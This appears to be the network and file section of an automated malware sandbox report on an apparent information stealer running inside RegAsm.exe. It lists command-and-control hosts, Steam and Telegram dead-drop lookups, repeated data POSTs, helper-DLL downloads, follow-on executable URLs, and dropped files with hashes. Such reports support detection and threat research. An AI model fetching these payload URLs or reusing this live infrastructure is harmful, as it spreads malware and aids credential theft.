          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTw3fF5NclwHoc5%2ByZwug%2F%2FBCjWm2k3urqXRkbClYNU%2B54F%2F%2FetIG9h5DVB63neyOwz%2FeFlV54Sgv1Di6X8eGf7s25mAEbSxk9cX8GI7tOclcF%2FR%2FAuJYe1oHXn8b5DxhUIE1rE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb397021c3a8873-LHR
        • flag-us
          DNS
          bellykmrebk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          bellykmrebk.site
          IN A
          Response
        • flag-us
          DNS
          agentyanlark.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          agentyanlark.site
          IN A
          Response
        • flag-us
          DNS
          writekdmsnu.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          writekdmsnu.site
          IN A
          Response
        • flag-us
          DNS
          delaylacedmn.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          delaylacedmn.site
          IN A
          Response
        • flag-gb
          GET
          https://steamcommunity.com/profiles/76561199724331900
          RegAsm.exe
          Remote address:
          104.82.234.109:443
          Request
          GET /profiles/76561199724331900 HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Host: steamcommunity.com
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
          Expires: Mon, 26 Jul 1997 05:00:00 GMT
          Cache-Control: no-cache
          Date: Mon, 30 Sep 2024 10:39:35 GMT
          Content-Length: 34734
          Connection: keep-alive
          Set-Cookie: sessionid=4f33dc0516c2e18b8ca0bd21; Path=/; Secure; SameSite=None
          Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
        • flag-us
          POST
          https://chaptermusu.store/api
          RegAsm.exe
          Remote address:
          172.67.207.133:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: chaptermusu.store
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:35 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=agvicuiv57ts953kn0nsvl3818; expires=Fri, 24 Jan 2025 04:26:14 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UC59UTNhy1QTl0dSjCo906tukiG0Yq7e5hgxlH355dOlMy6JyGZeLGerabIJ%2Bq36R5wLNy1JsrrytuEWZ6SJLIA0i10QiBYx49hD7BCZCciNbQPcSUxutClVkip%2BlngjLHoy5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb397087e713691-LHR
        • flag-us
          DNS
          56.163.245.4.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          56.163.245.4.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          18.31.95.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          18.31.95.13.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          98.117.19.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          98.117.19.2.in-addr.arpa
          IN PTR
          Response
          98.117.19.2.in-addr.arpa
          IN PTR
          a2-19-117-98deploystaticakamaitechnologiescom
        • flag-us
          DNS
          172.214.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.214.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          21.236.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          21.236.111.52.in-addr.arpa
          IN PTR
          Response
        • 149.154.167.99:443
          https://t.me/jamsemlg
          tls, http
          RegAsm.exe
          2.0kB
          19.8kB
          28
          21

          HTTP Request

          GET https://t.me/jamsemlg

          HTTP Response

          200
        • 5.42.101.62:80
          http://urusvisa.com/
          http
          RegAsm.exe
          10.6kB
          9.8kB
          31
          25

          HTTP Request

          GET http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200
        • 5.42.101.62:80
          http://urusvisa.com/
          http
          RegAsm.exe
          372.9kB
          6.8MB
          5202
          5121

          HTTP Request

          GET http://urusvisa.com/sql.dll

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          GET http://urusvisa.com/freebl3.dll

          HTTP Response

          200

          HTTP Request

          GET http://urusvisa.com/mozglue.dll

          HTTP Response

          200

          HTTP Request

          GET http://urusvisa.com/msvcp140.dll

          HTTP Response

          200

          HTTP Request

          GET http://urusvisa.com/softokn3.dll

          HTTP Response

          200

          HTTP Request

          GET http://urusvisa.com/vcruntime140.dll

          HTTP Response

          200

          HTTP Request

          GET http://urusvisa.com/nss3.dll

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200
        • 147.45.44.104:80
          http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe
          http
          RegAsm.exe
          40.3kB
          1.2MB
          842
          837

          HTTP Request

          GET http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe

          HTTP Response

          200

          HTTP Request

          GET http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe

          HTTP Response

          200

          HTTP Request

          GET http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe

          HTTP Response

          200
        • 172.67.205.129:443
          https://possiwreeste.site/api
          tls, http
          RegAsm.exe
          1.5kB
          5.5kB
          12
          12

          HTTP Request

          POST https://possiwreeste.site/api

          HTTP Response

          200

          HTTP Request

          POST https://possiwreeste.site/api

          HTTP Response

          200
        • 104.21.1.169:443
          https://underlinemdsj.site/api
          tls, http
          RegAsm.exe
          1.0kB
          4.5kB
          9
          9

          HTTP Request

          POST https://underlinemdsj.site/api

          HTTP Response

          200
        • 104.82.234.109:443
          https://steamcommunity.com/profiles/76561199724331900
          tls, http
          RegAsm.exe
          1.5kB
          42.3kB
          21
          36

          HTTP Request

          GET https://steamcommunity.com/profiles/76561199724331900

          HTTP Response

          200
        • 172.67.207.133:443
          https://chaptermusu.store/api
          tls, http
          RegAsm.exe
          1.0kB
          4.5kB
          9
          9

          HTTP Request

          POST https://chaptermusu.store/api

          HTTP Response

          200
        • 46.8.231.109:80
          http://46.8.231.109/c4754d4f680ead72.php
          http
          RegAsm.exe
          193.6kB
          5.4MB
          3912
          3892

          HTTP Request

          GET http://46.8.231.109/

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll

          HTTP Response

          200

          HTTP Request

          GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php

          HTTP Response

          200

          HTTP Request

          POST http://46.8.231.109/c4754d4f680ead72.php
        • 45.132.206.251:80
          http://cowod.hopto.org/
          http
          RegAsm.exe
          3.2kB
          360 B
          7
          4

          HTTP Request

          POST http://cowod.hopto.org/

          HTTP Response

          200
        • 149.154.167.99:443
          https://t.me/jamsemlg
          tls, http
          RegAsm.exe
          1.5kB
          19.3kB
          24
          20

          HTTP Request

          GET https://t.me/jamsemlg

          HTTP Response

          200
        • 5.42.101.62:80
          http://urusvisa.com/
          http
          RegAsm.exe
          8.8kB
          9.5kB
          28
          23

          HTTP Request

          GET http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200

          HTTP Request

          POST http://urusvisa.com/

          HTTP Response

          200
        • 147.45.44.104:80
          http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
          http
          RegAsm.exe
          27.9kB
          818.9kB
          594
          590

          HTTP Request

          GET http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe

          HTTP Response

          200

          HTTP Request

          GET http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe

          HTTP Response

          200
        • 172.67.205.129:443
          https://possiwreeste.site/api
          tls, http
          RegAsm.exe
          1.5kB
          5.6kB
          12
          12

          HTTP Request

          POST https://possiwreeste.site/api

          HTTP Response

          200

          HTTP Request

          POST https://possiwreeste.site/api

          HTTP Response

          200
        • 104.21.1.169:443
          https://underlinemdsj.site/api
          tls, http
          RegAsm.exe
          1.0kB
          4.5kB
          9
          9

          HTTP Request

          POST https://underlinemdsj.site/api

          HTTP Response

          200
        • 104.82.234.109:443
          https://steamcommunity.com/profiles/76561199724331900
          tls, http
          RegAsm.exe
          1.5kB
          42.3kB
          21
          36

          HTTP Request

          GET https://steamcommunity.com/profiles/76561199724331900

          HTTP Response

          200
        • 172.67.207.133:443
          https://chaptermusu.store/api
          tls, http
          RegAsm.exe
          1.0kB
          4.5kB
          9
          9

          HTTP Request

          POST https://chaptermusu.store/api

          HTTP Response

          200
        • 8.8.8.8:53
          t.me
          dns
          RegAsm.exe
          100 B
          66 B
          2
          1

          DNS Request

          t.me

          DNS Request

          t.me

          DNS Response

          149.154.167.99

        • 8.8.8.8:53
          28.118.140.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          28.118.140.52.in-addr.arpa

        • 8.8.8.8:53
          99.167.154.149.in-addr.arpa
          dns
          146 B
          166 B
          2
          1

          DNS Request

          99.167.154.149.in-addr.arpa

          DNS Request

          99.167.154.149.in-addr.arpa

        • 8.8.8.8:53
          urusvisa.com
          dns
          RegAsm.exe
          58 B
          74 B
          1
          1

          DNS Request

          urusvisa.com

          DNS Response

          5.42.101.62

        • 8.8.8.8:53
          62.101.42.5.in-addr.arpa
          dns
          70 B
          109 B
          1
          1

          DNS Request

          62.101.42.5.in-addr.arpa

        • 8.8.8.8:53
          22.160.190.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          22.160.190.20.in-addr.arpa

        • 8.8.8.8:53
          95.221.229.192.in-addr.arpa
          dns
          73 B
          144 B
          1
          1

          DNS Request

          95.221.229.192.in-addr.arpa

        • 8.8.8.8:53
          files.veritas.org.ng
          dns
          RegAsm.exe
          66 B
          82 B
          1
          1

          DNS Request

          files.veritas.org.ng

          DNS Response

          147.45.44.104

        • 8.8.8.8:53
          58.55.71.13.in-addr.arpa
          dns
          70 B
          144 B
          1
          1

          DNS Request

          58.55.71.13.in-addr.arpa

        • 8.8.8.8:53
          104.44.45.147.in-addr.arpa
          dns
          72 B
          127 B
          1
          1

          DNS Request

          104.44.45.147.in-addr.arpa

        • 8.8.8.8:53
          possiwreeste.site
          dns
          RegAsm.exe
          63 B
          95 B
          1
          1

          DNS Request

          possiwreeste.site

          DNS Response

          172.67.205.129
          104.21.22.157

        • 8.8.8.8:53
          famikyjdiag.site
          dns
          RegAsm.exe
          62 B
          127 B
          1
          1

          DNS Request

          famikyjdiag.site

        • 8.8.8.8:53
          commandejorsk.site
          dns
          RegAsm.exe
          64 B
          129 B
          1
          1

          DNS Request

          commandejorsk.site

        • 8.8.8.8:53
          underlinemdsj.site
          dns
          RegAsm.exe
          64 B
          96 B
          1
          1

          DNS Request

          underlinemdsj.site

          DNS Response

          104.21.1.169
          172.67.129.166

        • 8.8.8.8:53
          129.205.67.172.in-addr.arpa
          dns
          73 B
          135 B
          1
          1

          DNS Request

          129.205.67.172.in-addr.arpa

        • 8.8.8.8:53
          bellykmrebk.site
          dns
          RegAsm.exe
          62 B
          127 B
          1
          1

          DNS Request

          bellykmrebk.site

        • 8.8.8.8:53
          agentyanlark.site
          dns
          RegAsm.exe
          63 B
          128 B
          1
          1

          DNS Request

          agentyanlark.site

        • 8.8.8.8:53
          writekdmsnu.site
          dns
          RegAsm.exe
          62 B
          127 B
          1
          1

          DNS Request

          writekdmsnu.site

        • 8.8.8.8:53
          delaylacedmn.site
          dns
          RegAsm.exe
          63 B
          128 B
          1
          1

          DNS Request

          delaylacedmn.site

        • 8.8.8.8:53
          steamcommunity.com
          dns
          RegAsm.exe
          64 B
          80 B
          1
          1

          DNS Request

          steamcommunity.com

          DNS Response

          104.82.234.109

        • 8.8.8.8:53
          chaptermusu.store
          dns
          RegAsm.exe
          63 B
          95 B
          1
          1

          DNS Request

          chaptermusu.store

          DNS Response

          172.67.207.133
          104.21.37.109

        • 8.8.8.8:53
          169.1.21.104.in-addr.arpa
          dns
          71 B
          133 B
          1
          1

          DNS Request

          169.1.21.104.in-addr.arpa

        • 8.8.8.8:53
          109.234.82.104.in-addr.arpa
          dns
          73 B
          139 B
          1
          1

          DNS Request

          109.234.82.104.in-addr.arpa

        • 8.8.8.8:53
          cowod.hopto.org
          dns
          RegAsm.exe
          61 B
          77 B
          1
          1

          DNS Request

          cowod.hopto.org

          DNS Response

          45.132.206.251

        • 8.8.8.8:53
          109.231.8.46.in-addr.arpa
          dns
          71 B
          131 B
          1
          1

          DNS Request

          109.231.8.46.in-addr.arpa

        • 8.8.8.8:53
          133.207.67.172.in-addr.arpa
          dns
          73 B
          135 B
          1
          1

          DNS Request

          133.207.67.172.in-addr.arpa

        • 8.8.8.8:53
          251.206.132.45.in-addr.arpa
          dns
          73 B
          134 B
          1
          1

          DNS Request

          251.206.132.45.in-addr.arpa

        • 8.8.8.8:53
          22.249.124.192.in-addr.arpa
          dns
          73 B
          113 B
          1
          1

          DNS Request

          22.249.124.192.in-addr.arpa

        • 8.8.8.8:53
          famikyjdiag.site
          dns
          RegAsm.exe
          62 B
          127 B
          1
          1

          DNS Request

          famikyjdiag.site

        • 8.8.8.8:53
          commandejorsk.site
          dns
          RegAsm.exe
          64 B
          129 B
          1
          1

          DNS Request

          commandejorsk.site

        • 8.8.8.8:53
          bellykmrebk.site
          dns
          RegAsm.exe
          62 B
          127 B
          1
          1

          DNS Request

          bellykmrebk.site

        • 8.8.8.8:53
          agentyanlark.site
          dns
          RegAsm.exe
          63 B
          128 B
          1
          1

          DNS Request

          agentyanlark.site

        • 8.8.8.8:53
          writekdmsnu.site
          dns
          RegAsm.exe
          62 B
          127 B
          1
          1

          DNS Request

          writekdmsnu.site

        • 8.8.8.8:53
          delaylacedmn.site
          dns
          RegAsm.exe
          63 B
          128 B
          1
          1

          DNS Request

          delaylacedmn.site

        • 8.8.8.8:53
          56.163.245.4.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          56.163.245.4.in-addr.arpa

        • 8.8.8.8:53
          18.31.95.13.in-addr.arpa
          dns
          70 B
          144 B
          1
          1

          DNS Request

          18.31.95.13.in-addr.arpa

        • 8.8.8.8:53
          98.117.19.2.in-addr.arpa
          dns
          70 B
          133 B
          1
          1

          DNS Request

          98.117.19.2.in-addr.arpa

        • 8.8.8.8:53
          172.214.232.199.in-addr.arpa
          dns
          74 B
          128 B
          1
          1

          DNS Request

          172.214.232.199.in-addr.arpa

        • 8.8.8.8:53
          21.236.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          21.236.111.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\AAEHDAAKEH.exe

          Filesize

          371KB

          MD5

          32c2e31313c3df4a7a36c72503a5beba

          SHA1

          1c88051112dab0e306cadd9ee5d65f8dc229f079

          SHA256

          f1fa2872fcd33c6dbce8d974c0c0381c0762d46a53ceaca14a29727ad02baef3

          SHA512

          ee04d786e53f7fa203dbc4f8c018c72a907dabbd2d1c57e219b2ccc2dbd9d79a4ee8580b98f9b5c5024e628c0207cdd2bf93b9468e457f4ee00326c7c689f1ae

        • C:\ProgramData\CAKKKFBFID.exe

          Filesize

          404KB

          MD5

          38dabc7063c0a175a12c30bd44cf3dbc

          SHA1

          6d7aabebd8a417168e220c7497f4bc38c314da3b

          SHA256

          de664956d799e59e1cca0788d545922ee420e3afdcf277442f148f52bc78df89

          SHA512

          674760ad37cf7886ca4cd786e4d1966d3827fdad008a85a125e18bd474d073dae8d4296427253bb86e78d3173a300611ee5eb2e01c1f968700679350fc17a24d

        • C:\ProgramData\CBAKJEHDBGHIEBGCGDGH

          Filesize

          11KB

          MD5

          dc40481573c282143a39cba43012401f

          SHA1

          c3c16bc7ff9010407faf75e6a7c72fbd4c0385a4

          SHA256

          e7deac159b16dc9359279b7c6bf8a1a4869a61f5ce7e2a882c17b82e50d9022c

          SHA512

          ce67c4e3c761e2067c118fd8a27546b361907cf3d54893af50354e9d0c8555938b9a9dc881294ada4194291ee85b0e1bde23168c724990ab83c83e264ac67bf9

        • C:\ProgramData\FBAFIIJK

          Filesize

          114KB

          MD5

          db26309558628fa1ef6a1edd23ab2b09

          SHA1

          9bfb0530d0c2dcc6f9b3947bc3ca602943356368

          SHA256

          e6287cb739a35ef64a6d19ec146c90c848de8646032fd98d570042c0e2ecf070

          SHA512

          4171bc6af1ffc5d24d6ddade7b47e94b0547297e25d9a4d45ca831801208b7d83edda0b138436626749711a953a5818486c293e8749c5c2539ef070e848b237c

        • C:\ProgramData\HJDGCGDBGC.exe

          Filesize

          326KB

          MD5

          2832fbde1cf7ea83bd6fd6a4a5e8fe15

          SHA1

          1ced7a749d257091e0c3b75605fd3bc005e531de

          SHA256

          2b8bcd9d7d072feb114e0436dc10aa80fda52cdd46a4948ea1ae984f74898375

          SHA512

          c69f1197a0c74d057ab569d35c9af675fc465ce6abcc6c8fc32b316d3586871a426d7ab904c43827be7413748f0f45f7f3689076ca031fd858a4a8abf78b9299

        • C:\ProgramData\JJJECFIE

          Filesize

          116KB

          MD5

          f70aa3fa04f0536280f872ad17973c3d

          SHA1

          50a7b889329a92de1b272d0ecf5fce87395d3123

          SHA256

          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

          SHA512

          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

        • C:\ProgramData\KFCAFIIDHIDG\BFCFBK

          Filesize

          160KB

          MD5

          f310cf1ff562ae14449e0167a3e1fe46

          SHA1

          85c58afa9049467031c6c2b17f5c12ca73bb2788

          SHA256

          e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

          SHA512

          1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

        • C:\ProgramData\KFCAFIIDHIDG\BFCFBK

          Filesize

          40KB

          MD5

          a182561a527f929489bf4b8f74f65cd7

          SHA1

          8cd6866594759711ea1836e86a5b7ca64ee8911f

          SHA256

          42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

          SHA512

          9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

        • C:\ProgramData\KFCAFIIDHIDG\FHCGCF

          Filesize

          20KB

          MD5

          a603e09d617fea7517059b4924b1df93

          SHA1

          31d66e1496e0229c6a312f8be05da3f813b3fa9e

          SHA256

          ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

          SHA512

          eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

        • C:\ProgramData\freebl3.dll

          Filesize

          87KB

          MD5

          20b0ccea9a74ef454bdec596c2a85922

          SHA1

          bb1b5358924b9fd9164ad5fc32faac7f69a978da

          SHA256

          2433dbdd5da3f7c692446e5a4d0219392da5fe76b17c487a37d44ce5b9cdf2e5

          SHA512

          308ebed94d3ee2f9b8afadf2269e4e4bbb5abd6a99b03dd3a77265822ac5032a69da2b7049a576f3abbf456d1367ed0b53ff938285152d48f267f31ce1a3e54d

        • C:\ProgramData\mozglue.dll

          Filesize

          14KB

          MD5

          c7ed18a92b9ddc312f4baa23be479011

          SHA1

          4b095ce52ed1f64e97a5f2b5025d864cb938c524

          SHA256

          d08da443c4c739153b01e455af061142a6851b0615bc2e23ed21bd40f5f63ae0

          SHA512

          7f6f4ad6829a44970396bb634fed7aa3df80807150bdaaace28a9636ee84cc5ccf03a7f9902b49c7be423570fc60199b190f71932dc3912aa0afcc6534f1b72c

        • C:\ProgramData\mozglue.dll

          Filesize

          593KB

          MD5

          c8fd9be83bc728cc04beffafc2907fe9

          SHA1

          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

          SHA256

          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

          SHA512

          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

        • C:\ProgramData\nss3.dll

          Filesize

          2.0MB

          MD5

          1cc453cdf74f31e4d913ff9c10acdde2

          SHA1

          6e85eae544d6e965f15fa5c39700fa7202f3aafe

          SHA256

          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

          SHA512

          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

        • C:\ProgramData\vcruntime140.dll

          Filesize

          78KB

          MD5

          a37ee36b536409056a86f50e67777dd7

          SHA1

          1cafa159292aa736fc595fc04e16325b27cd6750

          SHA256

          8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

          SHA512

          3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AdminFCAAEBFHJJ.exe.log

          Filesize

          425B

          MD5

          4eaca4566b22b01cd3bc115b9b0b2196

          SHA1

          e743e0792c19f71740416e7b3c061d9f1336bf94

          SHA256

          34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

          SHA512

          bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZK5NPJWQ\sql[1].dll

          Filesize

          2.3MB

          MD5

          90e744829865d57082a7f452edc90de5

          SHA1

          833b178775f39675fa4e55eab1032353514e1052

          SHA256

          036a57102385d7f0d7b2deacf932c1c372ae30d924365b7a88f8a26657dd7550

          SHA512

          0a2d112ff7cb806a74f5ec17fe097d28107bb497d6ed5ad28ea47e6795434ba903cdb49aaf97a9a99c08cd0411f1969cad93031246dc107c26606a898e570323

        • memory/532-15-0x0000000022160000-0x00000000223BF000-memory.dmp

          Filesize

          2.4MB

        • memory/532-48-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-88-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-12-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-3-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-13-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-87-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-30-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-78-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-80-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-31-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-47-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-6-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/532-8-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/1944-105-0x0000000000400000-0x0000000000463000-memory.dmp

          Filesize

          396KB

        • memory/1944-111-0x0000000000400000-0x0000000000463000-memory.dmp

          Filesize

          396KB

        • memory/1944-108-0x0000000000400000-0x0000000000463000-memory.dmp

          Filesize

          396KB

        • memory/2556-127-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/2556-130-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/2556-224-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/2556-131-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/2556-210-0x0000000022660000-0x00000000228BF000-memory.dmp

          Filesize

          2.4MB

        • memory/2556-232-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/2556-207-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

        • memory/2556-208-0x0000000000400000-0x0000000000676000-memory.dmp

          Filesize

          2.5MB

